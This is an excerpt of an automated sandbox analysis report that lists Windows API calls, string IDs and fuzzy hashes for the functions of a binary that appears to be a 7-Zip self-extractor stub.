                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: MessageTimerWindow$CreateDestroyDispatchHandleKillModule
                                                                • String ID: Static
                                                                • API String ID: 1156981321-2272013587
                                                                • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                                                                • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9

                                                                Control-flow Graph

                                                                Control-flow graph for the function at 0x40b163 (graph image not recoverable from the page; executed/not-executed colouring and block listing omitted). API calls referenced by its basic blocks: memcpy, memmove, ??3@YAXPAX@Z.
                                                                APIs
                                                                • memcpy.MSVCRT(00000000,?,0000001F,00010000), ref: 0040B1C5
                                                                • memmove.MSVCRT(00000000,-000000C1,00000020,?,00010000), ref: 0040B289
                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040B298
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@memcpymemmove
                                                                • String ID:
                                                                • API String ID: 3549172513-3916222277
                                                                • Opcode ID: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                                • Instruction ID: 201babb0cc669d9fea5df8a163075e687156198648327345136f7fe875bf0058
                                                                • Opcode Fuzzy Hash: 5bad17cc77e2d39d7f6897ae69eb46f7fe1422127806d73b42e5b41d987a673b
                                                                • Instruction Fuzzy Hash: 495181B1A00205ABDF14DB95C889AAE7BB4EF49354F1441BAE905B7381D338DD81CB9D

                                                                Control-flow Graph

                                                                Control-flow graph for the function at 0x403354 (graph image not recoverable from the page; executed/not-executed colouring and block listing omitted). API calls referenced by its basic blocks: lstrlenW, GetSystemTimeAsFileTime, GetFileAttributesW, memcpy, ??3@YAXPAX@Z.
                                                                APIs
                                                                • lstrlenW.KERNEL32(00404AC6,?,?,00000000,?,?,?,?,00404AC6,?), ref: 00403361
                                                                • GetSystemTimeAsFileTime.KERNEL32(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 004033D7
                                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004033DE
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00404AC6,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?), ref: 0040349D
                                                                  • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                  • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                • memcpy.MSVCRT(-00000001,00404AC6,?,?,?,?,?,00404AC6,?), ref: 0040342F
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 0040346C
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00404AC6,00404AC6,?,?,?,?,00404AC6,?), ref: 004034B2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                • String ID:
                                                                • API String ID: 846840743-0
                                                                • Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                                • Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
                                                                • Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                                • Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                  • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                  • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                  • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                  • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                  • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                  • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                  • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                  • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                  • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                  • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                  • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
                                                                  • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                                                                • wsprintfW.USER32 ref: 004044A7
                                                                  • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                • String ID: 7zSfxFolder%02d$IA
                                                                • API String ID: 3387708999-1317665167
                                                                • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                                                • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58

                                                                Control-flow Graph

                                                                Control-flow graph for the function at 0x408ea4 (graph image not recoverable from the page; executed/not-executed colouring and block listing omitted). API call referenced by its basic blocks: ??2@YAPAXI@Z.
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
                                                                • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ??2@
                                                                • String ID: IA$IA
                                                                • API String ID: 1033339047-1400641299
                                                                • Opcode ID: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                                                • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                                                                • Opcode Fuzzy Hash: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                                                • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44

                                                                APIs
                                                                Strings
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: $KA$4KA$HKA$\KA
                                                                • API String ID: 1294909896-3316857779
                                                                • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                                                                • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C

                                                                APIs
                                                                • _EH_prolog.MSVCRT ref: 004096D0
                                                                • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
                                                                • ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
                                                                  • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
                                                                Strings
                                                                Similarity
                                                                • API ID: ??2@$H_prolog
                                                                • String ID: HIA
                                                                • API String ID: 3431946709-2712174624
                                                                • Opcode ID: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                                                • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                                                                • Opcode Fuzzy Hash: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                                                • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54

                                                                APIs
                                                                • lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                • lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                • memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                • memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                • memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                Similarity
                                                                • API ID: lstrlenmemcmp$memmove
                                                                • String ID:
                                                                • API String ID: 3251180759-0
                                                                • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                                                                • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55

                                                                APIs
                                                                • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
                                                                • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                                                                  • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                  • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                  • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                  • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                  • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                  • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                  • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                  • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                Similarity
                                                                • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                • String ID:
                                                                • API String ID: 359084233-0
                                                                • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                                                                • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E

                                                                APIs
                                                                • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                                                                • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                                                                • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                                                                • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                                                                Similarity
                                                                • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                • String ID:
                                                                • API String ID: 635176117-0
                                                                • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                                                                • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89

                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000015,?,00405D20,?,00417788,00417788), ref: 00404A5A
                                                                • ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
                                                                Strings
                                                                Similarity
                                                                • API ID: ??2@
                                                                • String ID: ExecuteFile
                                                                • API String ID: 1033339047-323923146
                                                                • Opcode ID: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                                                • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                                                                • Opcode Fuzzy Hash: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                                                • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D

                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                • memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                Similarity
                                                                • API ID: ??2@??3@memmove
                                                                • String ID:
                                                                • API String ID: 3828600508-0
                                                                • Opcode ID: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                                                • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                                                                • Opcode Fuzzy Hash: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                                                • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                                                                APIs
                                                                • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: GlobalMemoryStatus
                                                                • String ID: @
                                                                APIs
                                                                  • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                                                                  • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                  • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                  • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
                                                                Similarity
                                                                • API ID: ??3@$??2@ExceptionThrowmemmove
                                                                • String ID:
                                                                APIs
                                                                Similarity
                                                                • API ID: ??3@H_prolog
                                                                • String ID:
                                                                APIs
                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                Similarity
                                                                • API ID: ??2@??3@
                                                                • String ID:
                                                                APIs
                                                                • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                                                                Similarity
                                                                • API ID: ErrorFileLastPointer
                                                                • String ID:
                                                                APIs
                                                                • SysAllocString.OLEAUT32(?), ref: 0040ED05
                                                                • _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
                                                                Similarity
                                                                • API ID: AllocExceptionStringThrow
                                                                • String ID:
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32(?), ref: 0040E745
                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
                                                                Similarity
                                                                • API ID: CriticalSection$EnterLeave
                                                                • String ID:
                                                                APIs
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                APIs
                                                                • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                APIs
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                APIs
                                                                  • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                                                                Similarity
                                                                • API ID: CloseCreateFileHandle
                                                                • String ID:
                                                                APIs
                                                                • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
                                                                Similarity
                                                                • API ID: FileWrite
                                                                • String ID:
                                                                APIs
                                                                • _beginthreadex.MSVCRT ref: 00406552
                                                                  • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
                                                                Similarity
                                                                • API ID: ErrorLast_beginthreadex
                                                                • String ID:
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: H_prolog
                                                                • String ID:
                                                                • API String ID: 3519838083-0
                                                                • Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                                • Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
                                                                • Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                                • Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD
                                                                APIs
                                                                • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: FileRead
                                                                • String ID:
                                                                • API String ID: 2738559852-0
                                                                • Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                • Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
                                                                • Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                • Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54
                                                                APIs
                                                                • SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: FileTime
                                                                • String ID:
                                                                • API String ID: 1425588814-0
                                                                • Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                • Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
                                                                • Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                • Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: memmove
                                                                • String ID:
                                                                • API String ID: 2162964266-0
                                                                • Opcode ID: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
                                                                • Instruction ID: f56dbf57367ec124b55c1fed62106b1dafce564086f6503587e0b0fbfa293862
                                                                • Opcode Fuzzy Hash: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
                                                                • Instruction Fuzzy Hash: EA21A271A00B009FC724CFAAC88485BF7F9FF88724764896EE49A93A40E774B945CB54
                                                                APIs
                                                                • _CxxThrowException.MSVCRT(?,00414F84), ref: 0040E616
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.200383709084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.200383668959.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383761416.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383795245.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_Fqae7BLq4m.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow
                                                                • String ID:
                                                                • API String ID: 432778473-0
